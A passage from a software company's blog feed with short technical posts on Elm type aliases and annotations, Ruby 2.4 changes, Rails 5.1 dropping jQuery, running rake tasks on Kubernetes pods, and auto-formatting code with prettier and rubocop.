  make_db_call_and_return_user_status</code></pre><p>Now let's think about what the type annotation (Rubyists can think of it as a method signature) of the function <code>getUserStatus</code> might look like.</p><p>It takes a <code>username</code> as input and returns the user's status.</p><p>So the type annotation might look like</p><pre><code class="language-elm">getUserStatus : String -&gt; Status</code></pre><p>This works. However, the issue is that <code>String</code> is not expressive enough. It can be made more expressive if the signature were</p><pre><code class="language-elm">getUserStatus : Username -&gt; Status</code></pre><p>Now that we know about <code>type alias</code>, all we need to do is</p><pre><code class="language-elm">type alias Username = String</code></pre><p>This makes the code more expressive.</p><h2>No recursion with type alias</h2><p>An example of where we might need recursion is while designing a commenting system. A comment can have sub-comments. 
However, since <code>type alias</code> is just a substitution, recursion does not work with it.</p><pre><code class="language-elm">&gt; type alias Comment = { message : String, responses : List Comment }
This type alias is recursive, forming an infinite type!

2| type alias Comment = { message : String, responses : List Comment }
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
When I expand a recursive type alias, it just keeps getting bigger and bigger.
So dealiasing results in an infinitely large type! Try this instead:

    type Comment
        = Comment { message : String, responses : List Comment }

This is kind of a subtle distinction. I suggested the naive fix, but you can
often do something a bit nicer. So I would recommend reading more at:
&lt;https://github.com/elm-lang/elm-compiler/blob/0.18.0/hints/recursive-alias.md&gt;</code></pre><p><a href="https://github.com/elm-lang/elm-compiler/blob/master/hints/recursive-alias.md">Hint for Recursive Type Aliases</a> discusses this issue in greater detail and it also has a solution to the problem of recursion.</p><h2>Dual role of type alias as constructor and type</h2><p>Let's say that we have the following code.</p><pre><code class="language-elm">type alias UserInfo =
    { name : String, age : Int }</code></pre><p>Now we can use <code>UserInfo</code> as a constructor to create records.</p><pre><code class="language-elm">&gt; type alias UserInfo = { name : String, age : Int }
&gt; sam = UserInfo &quot;Sam&quot; 24
{ name = &quot;Sam&quot;, age = 24 } : Repl.UserInfo</code></pre><p>In the above case we used <code>UserInfo</code> as a <strong>constructor</strong> to create new user records. 
We did not use <code>UserInfo</code> as a <code>type</code>.</p><p>Now let's see another function.</p><pre><code class="language-elm">type alias UserInfo =
    { name : String, age : Int }

getUserAge : UserInfo -&gt; Int
getUserAge userInfo =
    userInfo.age</code></pre><p>In this case <code>UserInfo</code> is being used in the <strong>type annotation</strong> as a <strong>type</strong> and not as a <strong>constructor</strong>.</p><h2>Which one to use: type or type alias</h2><p>Both of them serve different purposes. Let's see an example.</p><p>Let's say that we have the following code.</p><pre><code class="language-elm">type alias UserInfo =
    { name : String, age : Int }

type alias Coach =
    { name : String, age : Int, sports : String }</code></pre><p>Now let's write a function that gets the age of the given user.</p><pre><code class="language-elm">getUserAge : UserInfo -&gt; Int
getUserAge userInfo =
    userInfo.age</code></pre><p>Now let's create two types of users.</p><pre><code class="language-elm">sam = UserInfo &quot;Sam&quot; 24
charlie = Coach &quot;Charlie&quot; 52 &quot;Basketball&quot;</code></pre><p>Now let's try to get the age of both of these people.</p><pre><code class="language-elm">getUserAge sam
getUserAge charlie</code></pre><p>Here is <a href="https://gist.github.com/neerajsingh0101/83f26c0c32c310ab01fe9a27f5bc9e98">the complete version</a> if you want to run it.</p><p><strong>Please note that elm-repl <a href="https://github.com/elm-lang/elm-repl/issues/86">does not support type annotations</a>, so you can't test this code in elm-repl.</strong></p><p>The main point here is that since we used <code>type alias</code>, the function <code>getUserAge</code> works for both <code>UserInfo</code> as well as <code>Coach</code>. It would be a stretch to say that this sounds like &quot;duck typing in Elm&quot;, but it comes pretty close.</p><p>Yes, Elm is a statically typed language and it enforces types. 
However, the point here is that a <code>type alias</code> is not exactly a type.</p><p>So why did this code work?</p><p>It worked because of Elm's support for <a href="http://elm-lang.org/docs/records#pattern-matching">pattern matching</a> on records.</p><p>As mentioned earlier, <code>type alias</code> is just a shortcut for typing the verbose version. So let's expand the type annotation of <code>getUserAge</code>.</p><p>If we were not using <code>type alias UserInfo</code>, it might have looked as shown below.</p><pre><code class="language-elm">getUserAge : { name : String, age : Int } -&gt; Int</code></pre><p>Here the argument is a record. Here is the <a href="http://elm-lang.org/docs/records">official guide on Records</a>. While dealing with records, Elm looks at the argument, and if that argument is a record and has all the matching attributes, then Elm will not complain, because of its support for pattern matching.</p><p>Since <code>Coach</code> has both the <code>name</code> and <code>age</code> attributes, <code>getUserAge charlie</code> works.</p><p>You can test it by removing the attribute <code>age</code> from <code>Coach</code>, and then you will see that the compiler will complain.</p><p>In summary, if we want strict type enforcement then we should go for <code>type</code>. If we want to avoid typing all the attributes all the time, and we want pattern matching, then we should go for <code>type alias</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Arrows in Elm's method signature]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/arrows-in-method-signature-of-elm"/>
      <updated>2017-07-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/arrows-in-method-signature-of-elm</id>
      <content type="html"><![CDATA[<p>Let's look at the documentation of the <code>length</code> function of <code>String</code> in Elm.</p><p>It's <a href="http://package.elm-lang.org/packages/elm-lang/core/5.1.1/String#length">here</a> and it looks like this.</p><pre><code class="language-elm">length : String -&gt; Int

&gt; String.length &quot;Hello World&quot;
11 : Int</code></pre><p>If we look at the similar feature in the Ruby world then we get the <a href="https://ruby-doc.org/core-2.2.0/String.html#method-i-length">length</a> method.</p><pre><code class="language-ruby">length -&gt; integer</code></pre><p>The method signature in Ruby's documentation and in Elm's documentation is quite similar. Both return an integer.</p><p>In Elm's world, method definitions are called &quot;Type Annotations&quot;. Going forward that's what I'm going to use in this blog.</p><p>Now let's look at the method definition of the <code>slice</code> method in Ruby.</p><p>It looks like <a href="https://ruby-doc.org/core-2.2.0/String.html#slice-method">this</a>.</p><pre><code class="language-ruby">slice(start, length) -&gt; new_str or nil

irb(main):006:0&gt; &quot;snakes on a plane!&quot;.slice(0,6)
=&gt; &quot;snakes&quot;</code></pre><p>In the Elm world it looks like <a href="http://package.elm-lang.org/packages/elm-lang/core/5.1.1/String#slice">this</a>.</p><pre><code class="language-elm">slice : Int -&gt; Int -&gt; String -&gt; String

&gt; String.slice 0 6 &quot;snakes on a plane!&quot;
&quot;snakes&quot; : String</code></pre><p>The question is: what's up with all those arrows?</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 no exception for objects converted to IPAddr]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-ip-addr-methods-do-not-throw-exception-for-objects-that-cant-be-converted-to-ipaddr"/>
      <updated>2017-06-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-ip-addr-methods-do-not-throw-exception-for-objects-that-cant-be-converted-to-ipaddr</id>
      <content type="html"><![CDATA[<p>In Ruby, the <a href="https://docs.ruby-lang.org/en/2.4.0/IPAddr.html#method-i-3D-3D"><code>IPAddr#==</code></a> method is used to check whether two IP addresses are equal or not. Ruby also has the <a href="https://docs.ruby-lang.org/en/2.4.0/IPAddr.html#method-i-3C-3D-3E"><code>IPAddr#&lt;=&gt;</code></a> method, which is used to compare two IP addresses.</p><p>In Ruby 2.3, the behavior of these methods was inconsistent. Let's see an example.</p><pre><code class="language-ruby"># Ruby 2.3
&gt;&gt; IPAddr.new(&quot;1.2.1.3&quot;) == &quot;Some ip address&quot;
=&gt; IPAddr::InvalidAddressError: invalid address</code></pre><p>But if the receiver is a string that is not a valid IP address and the argument is a valid <code>IPAddr</code>, it would return <code>false</code>.</p><pre><code class="language-ruby"># Ruby 2.3
&gt;&gt; &quot;Some ip address&quot; == IPAddr.new(&quot;1.2.1.3&quot;)
=&gt; false</code></pre><p>The <code>&lt;=&gt;</code> method would raise an exception in both cases.</p><pre><code class="language-ruby"># Ruby 2.3
&gt;&gt; &quot;Some ip address&quot; &lt;=&gt; IPAddr.new(&quot;1.2.1.3&quot;)
=&gt; IPAddr::InvalidAddressError: invalid address
&gt;&gt; IPAddr.new(&quot;1.2.1.3&quot;) &lt;=&gt; &quot;Some ip address&quot;
=&gt; IPAddr::InvalidAddressError: invalid address</code></pre><p>In Ruby 2.4, <a href="https://bugs.ruby-lang.org/issues/12799">this issue</a> is <a href="https://github.com/ruby/ruby/pull/1435/files#diff-3504e08cf251c76a597c727011315dd1">fixed</a>; both methods now return a result without raising an exception if the objects being compared can't be converted to an <code>IPAddr</code> object.</p><pre><code class="language-ruby"># Ruby 2.4
&gt;&gt; IPAddr.new(&quot;1.2.1.3&quot;) == &quot;Some ip address&quot;
=&gt; false
&gt;&gt; &quot;Some ip address&quot; == IPAddr.new(&quot;1.2.1.3&quot;)
=&gt; false
&gt;&gt; IPAddr.new(&quot;1.2.1.3&quot;) &lt;=&gt; &quot;Some ip address&quot;
=&gt; nil
&gt;&gt; &quot;Some ip address&quot; &lt;=&gt; 
IPAddr.new(&quot;1.2.1.3&quot;)
=&gt; nil</code></pre><p>This might cause some backward compatibility issues if our code expects the exception, which is no longer raised in Ruby 2.4.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.1 dropped jQuery dependency in default stack]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-1-has-dropped-dependency-on-jquery-from-the-default-stack"/>
      <updated>2017-06-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-1-has-dropped-dependency-on-jquery-from-the-default-stack</id>
      <content type="html"><![CDATA[<p>Rails has been dependent on jQuery for providing the unobtrusive JavaScript helpers such as <a href="http://guides.rubyonrails.org/working_with_javascript_in_rails.html#unobtrusive-javascript">data-remote, data-url and the Ajax interactions</a>. Every Rails application before Rails 5.1 would have the <code>jquery-rails</code> gem included by default.</p><p>The <code>jquery-rails</code> gem contains the jquery-ujs driver which provides all the nice unobtrusive features.</p><p>But JavaScript has now progressed to the point where the unobtrusive driver which Rails needs can be written in plain vanilla JavaScript.</p><p>That's what has happened for the 5.1 release. The <code>jquery-ujs</code> driver has been rewritten in plain JavaScript as part of a GSoC project by <a href="https://github.com/liudangyi">Dangyui Liu</a>.</p><p>Now that the unobtrusive JavaScript driver does not depend on jQuery, new Rails applications also need not depend on jQuery.</p><p>So, Rails 5.1 has <a href="https://github.com/rails/rails/issues/25208">dropped jQuery</a> as a <a href="https://github.com/rails/rails/pull/27113">dependency from the default stack</a>.</p><p>The previous <a href="https://github.com/rails/jquery-rails">jQuery-based</a> approach is still available; it's just not part of the default stack. You will need to manually add the <code>jquery-rails</code> gem to a newly created 5.1 application and <a href="https://github.com/rails/jquery-ujs#installation-using-the-jquery-rails-gem">update the application.js</a> to include the <code>jquery-ujs</code> driver.</p><p>It's worth noting that <code>rails-ujs</code> only supports IE 11+. 
Visit the <a href="https://basecamp.com/help/3/guides/account/browsers#desktop-browser-support">Desktop Browser Support</a> section of Basecamp to see the full list of all the supported browsers.</p><h4>Browser support without jQuery</h4><p>We saw some discussion about which browsers are supported without jQuery. We decided to test it ourselves on a plain vanilla CRUD Rails app. We tested &quot;adding&quot;, &quot;editing&quot; and &quot;deleting&quot; of a resource.</p><p><strong>We found all three operations (adding, editing and deleting) to be working in the following cases.</strong></p><ul><li>Win 7 - IE 9</li><li>Win 7 - IE 10</li><li>Win 7 - IE 11</li><li>Win 8 - IE 10</li><li>Win 8.1 - IE 11</li><li>Win 10 - IE 14 Edge</li><li>Win 10 - IE 15 Edge</li><li>Win 10 - Firefox 53</li><li>Win 10 - Chrome 58</li><li>Win 10 - Safari 5.1</li><li>Mac Sierra - Safari 10.1</li><li>Mac Sierra - Firefox 53</li><li>Mac Sierra - Chrome 58</li></ul><h4>API change for the event handlers</h4><p>The <code>rails-ujs</code> driver has changed the signature of the event handler functions to just pass one <code>event</code> object, instead of <code>event</code>, <code>data</code>, <code>status</code> and <code>xhr</code> as in the case of the <code>jquery-ujs</code> driver.</p><p>Check the <a href="http://edgeguides.rubyonrails.org/working_with_javascript_in_rails.html#rails-ujs-event-handlers">documentation for the rails-ujs event handlers</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 deprecated constants TRUE, FALSE & NIL]]></title>
       <author><name>Akshay Vishnoi</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-has-depecated-constants-true-false-and-nil"/>
      <updated>2017-06-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-has-depecated-constants-true-false-and-nil</id>
      <content type="html"><![CDATA[<p>Ruby has top-level constants like <code>TRUE</code>, <code>FALSE</code> and <code>NIL</code>. These constants are just synonyms for <code>true</code>, <code>false</code> and <code>nil</code> respectively.</p><p>In Ruby 2.4, these constants are <a href="https://bugs.ruby-lang.org/issues/12574">deprecated</a> and will be removed in a future version.</p><pre><code class="language-ruby"># Ruby 2.3
2.3.1 :001 &gt; TRUE
 =&gt; true
2.3.1 :002 &gt; FALSE
 =&gt; false
2.3.1 :003 &gt; NIL
 =&gt; nil</code></pre><pre><code class="language-ruby"># Ruby 2.4
2.4.0 :001 &gt; TRUE
(irb):1: warning: constant ::TRUE is deprecated
 =&gt; true
2.4.0 :002 &gt; FALSE
(irb):2: warning: constant ::FALSE is deprecated
 =&gt; false
2.4.0 :003 &gt; NIL
(irb):3: warning: constant ::NIL is deprecated
 =&gt; nil</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails using db:migrate & db:seed on Kubernetes]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/managing-rails-tasks-such-as-db-migrate-and-db-seed-on-kuberenetes-while-performing-rolling-deployments"/>
      <updated>2017-06-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/managing-rails-tasks-such-as-db-migrate-and-db-seed-on-kuberenetes-while-performing-rolling-deployments</id>
      <content type="html"><![CDATA[<p>This post assumes that you have a basic understanding of <a href="http://kubernetes.io/">Kubernetes</a> terms like <a href="http://kubernetes.io/docs/user-guide/pods/">pods</a> and <a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>.</p><h3>Problem</h3><p>We want to deploy a Rails application on Kubernetes. We assume that the <code>assets:precompile</code> task is run as part of the Docker image build process.</p><p>We want to run rake tasks such as <code>db:migrate</code> and <code>db:seed</code> on the initial deployment, and just the <code>db:migrate</code> task on each later deployment.</p><p>We cannot run these tasks while building the Docker image, as the build would not be able to connect to the database at that point.</p><p>So, how do we run these tasks?</p><h3>Solution</h3><p>We assume that we have a Docker image named <code>myorg/myapp:v0.0.1</code> which contains the source code of our Rails application.</p><p>We also assume that we have included a <code>database.yml</code> in this Docker image with the configuration needed for connecting to the database.</p><p>We need to create a <a href="https://kubernetes.io/docs/concepts/workloads/controllers/deployment/">Kubernetes deployment</a> template with the following content.</p><pre><code class="language-yaml">apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: myapp
spec:
  template:
    spec:
      containers:
        - image: myorg/myapp:v0.0.1
          name: myapp
          imagePullPolicy: IfNotPresent
          env:
            - name: DB_NAME
              value: myapp
            - name: DB_USERNAME
              value: username
            - name: DB_PASSWORD
              value: password
            - name: DB_HOST
              value: 54.10.10.245
          ports:
            - containerPort: 80
      imagePullSecrets:
        - name: docker_pull_secret</code></pre><p>Let's save this template file as <code>myapp-deployment.yml</code>.</p><p>We 
can change the options and environment variables in above template as per ourneed. The environment variables specified here will be available to our Railsapplication.</p><p>To apply above template for the first time on Kubernetes, we will use thefollowing command.</p><pre><code class="language-bash">$ kubectl create -f myapp-deployment.yml</code></pre><p>Later on, to apply the same template after modifications such as change in theDocker image name or change in the environment variables, we will use thefollowing command.</p><pre><code class="language-bash">$ kubectl apply -f myapp-deployment.yml</code></pre><p>After applying the deployment template, it will create a pod for our applicationon Kubernetes.</p><p>To see the pods, we use the following command.</p><pre><code class="language-bash">$ kubectl get pods</code></pre><p>Let's say that our app is now running in the pod named <code>myapp-4007005961-1st7s</code>.</p><p>To execute a rake task, for e.g. <code>db:migrate</code> on this pod, we can run thefollowing command.</p><pre><code class="language-bash">$ kubectl exec myapp-4007005961-1st7s                              \          -- bash -c                                               \          'cd ~/myapp &amp;&amp; RAILS_ENV=production bin/rake db:migrate'</code></pre><p>Similarly, we can execute <code>db:seed</code> rake task as well.</p><p>If we already have an automated flow for deployments on Kubernetes, we can makeuse of this approach to programmatically or conditionally run any rake task asper the needs.</p><h3>Why not to use <a href="https://kubernetes.io/docs/concepts/workloads/controllers/jobs-run-to-completion/">Kubernetes Jobs</a> to solve this?</h3><p>We faced some issues while using Kubernetes Jobs to run migration and seed raketasks.</p><ol><li><p>If the rake task returns a non-zero exit code, the Kubernetes job keepsspawning pods until the task command returns a zero exit code.</p></li><li><p>To get around the issue mentioned above we needed 
to unnecessarily implementadditional custom logic of checking job status and the status of all thespawned pods.</p></li><li><p>Capturing the command's STDOUT or STDERR was difficult using Kubernetes job.</p></li><li><p>Some housekeeping was needed such as manually terminating the job if itwasn't successful. If not done, it will fail to create a Kubernetes job withthe same name, which is bound to occur when we perform later deployments.</p></li></ol><p>Because of these issues, we choose not to rely on Kubernetes jobs to solve thisproblem.</p>]]></content>
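The post mentions that this approach can be run programmatically from an automated deploy flow. As a rough sketch of that idea, a small Ruby helper could build the same `kubectl exec` invocation shown in the article. The app name, pod name, and home-directory layout below are illustrative assumptions, not details from the post.

```ruby
# Hypothetical deploy-time helper: build the `kubectl exec` command that
# runs a rake task on a given pod (mirrors the command shape in the post).
def rake_exec_command(pod, app:, task:, env: "production")
  ["kubectl", "exec", pod, "--", "bash", "-c",
   "cd ~/#{app} && RAILS_ENV=#{env} bin/rake #{task}"]
end

cmd = rake_exec_command("myapp-4007005961-1st7s", app: "myapp", task: "db:migrate")
# Run it with: system(*cmd)
```

Building the command as an array (rather than one interpolated string) avoids an extra layer of shell quoting when handing it to `system`.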
    </entry><entry>
       <title><![CDATA[Ruby 2.4 allows custom suffix of rotated log files]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-allows-to-customize-suffix-of-the-rotated-log-files"/>
      <updated>2017-06-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-allows-to-customize-suffix-of-the-rotated-log-files</id>
      <content type="html"><![CDATA[<p>In Ruby, the <a href="http://ruby-doc.org/stdlib-2.4.0/libdoc/logger/rdoc/Logger.html#method-c-new">Logger</a> class can be used for rotating log files daily, weekly or monthly.</p><pre><code class="language-ruby">daily_logger = Logger.new('foo.log', 'daily')
weekly_logger = Logger.new('foo.log', 'weekly')
monthly_logger = Logger.new('foo.log', 'monthly')</code></pre><p>At the end of the specified period, Ruby renames the rotated log file by appending a date suffix:</p><pre><code class="language-ruby">foo.log.20170615</code></pre><p>The format of the suffix for the rotated log file is <code>%Y%m%d</code>. In Ruby 2.3, there was no way to customize this suffix format.</p><p>Ruby 2.4 <a href="https://github.com/ruby/ruby/commit/2c6f15b1ad90af37d7e0eefff7b3f5262e0a4c0b">added the ability</a> to customize the suffix format by passing an extra argument, <code>shift_period_suffix</code>.</p><pre><code class="language-ruby"># Ruby 2.4
logger = Logger.new('foo.log', 'weekly', shift_period_suffix: '%d-%m-%Y')</code></pre><p>Now the suffix of the rotated log file will use the custom date format which we passed.</p><pre><code class="language-ruby">foo.log.15-06-2017</code></pre>]]></content>
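To make the suffix mechanics concrete: the value passed as `shift_period_suffix` is just a `strftime` format string, which the Logger applies to the rotation date. A minimal sketch (the temp-directory path is only there to keep the example self-contained):

```ruby
require 'logger'
require 'tmpdir'

# shift_period_suffix (Ruby 2.4+) replaces the default '%Y%m%d' format.
log_path = File.join(Dir.mktmpdir, 'foo.log')
logger = Logger.new(log_path, 'weekly', shift_period_suffix: '%d-%m-%Y')
logger.info('hello')   # writes to foo.log until the weekly rotation kicks in
logger.close

# The suffix a file rotated on 2017-06-15 would receive:
suffix = Time.new(2017, 6, 15).strftime('%d-%m-%Y')
# suffix == "15-06-2017", so the rotated file becomes foo.log.15-06-2017
```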
    </entry><entry>
       <title><![CDATA[Ruby 2.4 Hash#transform_values & destructive version]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-added-hash-transform-values-and-its-destructive-version-from-active-support"/>
      <updated>2017-06-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-added-hash-transform-values-and-its-destructive-version-from-active-support</id>
      <content type="html"><![CDATA[<p>It is a common use case to transform the values of a hash.</p><pre><code class="language-ruby">{ a: 1, b: 2, c: 3 } =&gt; { a: 2, b: 4, c: 6 }
{ a: &quot;B&quot;, c: &quot;D&quot;, e: &quot;F&quot; } =&gt; { a: &quot;b&quot;, c: &quot;d&quot;, e: &quot;f&quot; }</code></pre><p>We can transform the values of a hash destructively (i.e. modify the original hash with new values) or non-destructively (i.e. return a new hash instead of modifying the original hash).</p><p>Prior to Ruby 2.4, we needed code like the following to transform the values of a hash.</p><pre><code class="language-ruby"># Ruby 2.3 Non-destructive version
&gt; hash = { a: 1, b: 2, c: 3 } #=&gt; {:a=&gt;1, :b=&gt;2, :c=&gt;3}
&gt; hash.inject({}) { |h, (k, v)| h[k] = v * 2; h } #=&gt; {:a=&gt;2, :b=&gt;4, :c=&gt;6}
&gt; hash #=&gt; {:a=&gt;1, :b=&gt;2, :c=&gt;3}
&gt; hash = { a: &quot;B&quot;, c: &quot;D&quot;, e: &quot;F&quot; } #=&gt; {:a=&gt;&quot;B&quot;, :c=&gt;&quot;D&quot;, :e=&gt;&quot;F&quot;}
&gt; hash.inject({}) { |h, (k, v)| h[k] = v.downcase; h } #=&gt; {:a=&gt;&quot;b&quot;, :c=&gt;&quot;d&quot;, :e=&gt;&quot;f&quot;}
&gt; hash #=&gt; {:a=&gt;&quot;B&quot;, :c=&gt;&quot;D&quot;, :e=&gt;&quot;F&quot;}</code></pre><pre><code class="language-ruby"># Ruby 2.3 Destructive version
&gt; hash = { a: 1, b: 2, c: 3 } #=&gt; {:a=&gt;1, :b=&gt;2, :c=&gt;3}
&gt; hash.each { |k, v| hash[k] = v * 2 } #=&gt; {:a=&gt;2, :b=&gt;4, :c=&gt;6}
&gt; hash #=&gt; {:a=&gt;2, :b=&gt;4, :c=&gt;6}
&gt; hash = { a: &quot;B&quot;, c: &quot;D&quot;, e: &quot;F&quot; } #=&gt; {:a=&gt;&quot;B&quot;, :c=&gt;&quot;D&quot;, :e=&gt;&quot;F&quot;}
&gt; hash.each { |k, v| hash[k] = v.downcase } #=&gt; {:a=&gt;&quot;b&quot;, :c=&gt;&quot;d&quot;, :e=&gt;&quot;f&quot;}
&gt; hash #=&gt; {:a=&gt;&quot;b&quot;, :c=&gt;&quot;d&quot;, :e=&gt;&quot;f&quot;}</code></pre><h2>transform_values and transform_values! from Active Support</h2><p>Active Support had already implemented the handy methods <a href="https://github.com/rails/rails/commit/b2cf8b251aac39c1e3ce71bc1de34a2ce5ef52b1">Hash#transform_values and Hash#transform_values!</a> to transform hash values.</p><p>Ruby 2.4 first implemented <a href="https://github.com/ruby/ruby/commit/ea5184b939ec3dbdcbd7013da350b8dcb6ca6107">Hash#map_v and Hash#map_v!</a> and then renamed them to <a href="https://github.com/ruby/ruby/commit/eaa0a27f6149a9afa2b29729307ff9cc7b0bc95f">Hash#transform_values and Hash#transform_values!</a> for the same purpose.</p><pre><code class="language-ruby"># Ruby 2.4 Non-destructive version
&gt; hash = { a: 1, b: 2, c: 3 } #=&gt; {:a=&gt;1, :b=&gt;2, :c=&gt;3}
&gt; hash.transform_values { |v| v * 2 } #=&gt; {:a=&gt;2, :b=&gt;4, :c=&gt;6}
&gt; hash #=&gt; {:a=&gt;1, :b=&gt;2, :c=&gt;3}
&gt; hash = { a: &quot;B&quot;, c: &quot;D&quot;, e: &quot;F&quot; } #=&gt; {:a=&gt;&quot;B&quot;, :c=&gt;&quot;D&quot;, :e=&gt;&quot;F&quot;}
&gt; hash.transform_values(&amp;:downcase) #=&gt; {:a=&gt;&quot;b&quot;, :c=&gt;&quot;d&quot;, :e=&gt;&quot;f&quot;}
&gt; hash #=&gt; {:a=&gt;&quot;B&quot;, :c=&gt;&quot;D&quot;, :e=&gt;&quot;F&quot;}</code></pre><pre><code class="language-ruby"># Ruby 2.4 Destructive version
&gt; hash = { a: 1, b: 2, c: 3 } #=&gt; {:a=&gt;1, :b=&gt;2, :c=&gt;3}
&gt; hash.transform_values! { |v| v * 2 } #=&gt; {:a=&gt;2, :b=&gt;4, :c=&gt;6}
&gt; hash #=&gt; {:a=&gt;2, :b=&gt;4, :c=&gt;6}
&gt; hash = { a: &quot;B&quot;, c: &quot;D&quot;, e: &quot;F&quot; } #=&gt; {:a=&gt;&quot;B&quot;, :c=&gt;&quot;D&quot;, :e=&gt;&quot;F&quot;}
&gt; hash.transform_values!(&amp;:downcase) #=&gt; {:a=&gt;&quot;b&quot;, :c=&gt;&quot;d&quot;, :e=&gt;&quot;f&quot;}
&gt; hash #=&gt; {:a=&gt;&quot;b&quot;, :c=&gt;&quot;d&quot;, :e=&gt;&quot;f&quot;}</code></pre>]]></content>
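For readers stuck on older Rubies without Active Support, the non-destructive semantics the article describes can be sketched in a few lines of plain Ruby. The helper name below is made up for illustration; it is not part of any standard library.

```ruby
# A minimal pre-2.4 stand-in sketching Hash#transform_values' semantics:
# build a new hash from the block's return values, leaving the original alone.
def transform_values_compat(hash)
  hash.each_with_object({}) { |(k, v), out| out[k] = yield(v) }
end

original = { a: 1, b: 2, c: 3 }
doubled  = transform_values_compat(original) { |v| v * 2 }
# doubled == { a: 2, b: 4, c: 6 }; original is unchanged
```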
    </entry><entry>
       <title><![CDATA[Prettier & rubocop in Rails to format JS, CSS & Ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/using-prettier-and-rubocop-in-ruby-on-rails-to-format-javascript-css-ruby-files"/>
      <updated>2017-06-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-prettier-and-rubocop-in-ruby-on-rails-to-format-javascript-css-ruby-files</id>
      <content type="html"><![CDATA[<p>Recently we started using <a href="https://github.com/prettier/prettier">prettier</a> and <a href="https://github.com/bbatsov/rubocop">rubocop</a> to automatically format our code on git commit. Here is how we got started with setting up both <code>prettier</code> and <code>rubocop</code> in our Ruby on Rails applications.</p><h4>Generate package.json</h4><p>If you don't already have a <code>package.json</code> file then execute the following command to create a <code>package.json</code> file with value <code>{}</code>.</p><pre><code class="language-bash">echo &quot;{}&quot; &gt; package.json</code></pre><h4>Install prettier</h4><p>Now execute the following commands to install prettier.</p><pre><code class="language-bash">npm install --save-dev lint-staged husky prettier

# Ignore `node_modules`
echo &quot;/node_modules&quot; &gt;&gt; .gitignore
echo &quot;/package-lock.json&quot; &gt;&gt; .gitignore</code></pre><h4>Add scripts &amp; ignore node_modules</h4><p>Now open <code>package.json</code> and replace the whole file with the following content.</p><pre><code class="language-ruby">{
  &quot;scripts&quot;: {
    &quot;precommit&quot;: &quot;lint-staged&quot;
  },
  &quot;lint-staged&quot;: {
    &quot;app/**/*.{js,es6,jsx}&quot;: [
      &quot;./node_modules/prettier/bin/prettier.js --single-quote --trailing-comma es5 --write&quot;,
      &quot;git add&quot;
    ]
  },
  &quot;devDependencies&quot;: {
    &quot;husky&quot;: &quot;^0.13.4&quot;,
    &quot;lint-staged&quot;: &quot;^3.6.0&quot;,
    &quot;prettier&quot;: &quot;^1.4.2&quot;
  }
}</code></pre><p>Note that if you send a pull request with your changes and CircleCI or a similar tool runs <code>npm install</code>, then downgrading <code>husky</code> to <code>^0.13.4</code> will solve the problem.</p><p>In Ruby on Rails applications third-party vendor files are stored in the <code>vendor</code> folder and we do not want to format JavaScript code in those files. Hence we have applied the rule to run prettier only on files residing in the <code>app</code> directory.</p><p>Here at BigBinary we store all JavaScript files using ES6 features with the extension <code>.es6</code>. Hence we are running such files through <code>prettier</code>. Customize this to match your application's requirements.</p><p>Note that the &quot;pre-commit&quot; hook is powered by <a href="https://www.npmjs.com/package/husky">husky</a>. Read up on the &quot;husky&quot; documentation to learn about the &quot;prepush&quot; hook and other features.</p><h4>Commit the change</h4><pre><code class="language-bash">git add .
git commit -m &quot;Added support for prettier for JavaScript files&quot;</code></pre><h3>Execute prettier on current code</h3><pre><code class="language-bash">./node_modules/prettier/bin/prettier.js --single-quote --trailing-comma es5 --write &quot;{app,__{tests,mocks}__}/**/*.{js,es6,jsx,scss,css}&quot;</code></pre><h2>We want more</h2><p>We were thrilled to see prettier format our JavaScript code. We wanted more of it in more places. We found that prettier can also format CSS files, so we changed our code to also format CSS code. It was an easy change. All we had to do was change one line.</p><p>Before : <code>&quot;app/**/*.{js,es6,jsx}&quot;</code></p><p>After : <code>&quot;app/**/*.{js,es6,jsx,scss,css}&quot;</code></p><h2>Inspired by prettier we welcomed rubocop</h2><p>Now that JavaScript and CSS files were covered, we started looking at other places where we could get this productivity gain.</p><p>Since we write a lot of Ruby code we turned our attention to <a href="https://github.com/bbatsov/rubocop">rubocop</a>.</p><p>It turned out that &quot;rubocop&quot; already had a feature to automatically format the code.</p><p>Open <code>package.json</code> and change the <code>lint-staged</code> section to the following.</p><pre><code class="language-ruby">&quot;app/**/*.{js,es6,jsx,scss,css}&quot;: [
  &quot;./node_modules/prettier/bin/prettier.js --single-quote --trailing-comma es5 --write&quot;,
  &quot;git add&quot;
],
&quot;{app,test}/**/*.rb&quot;: [
  &quot;bundle exec rubocop -a&quot;,
  &quot;git add&quot;
]</code></pre><p>Open <code>Gemfile</code> and add the following line.</p><pre><code class="language-ruby">group :development do
  gem &quot;rubocop&quot;
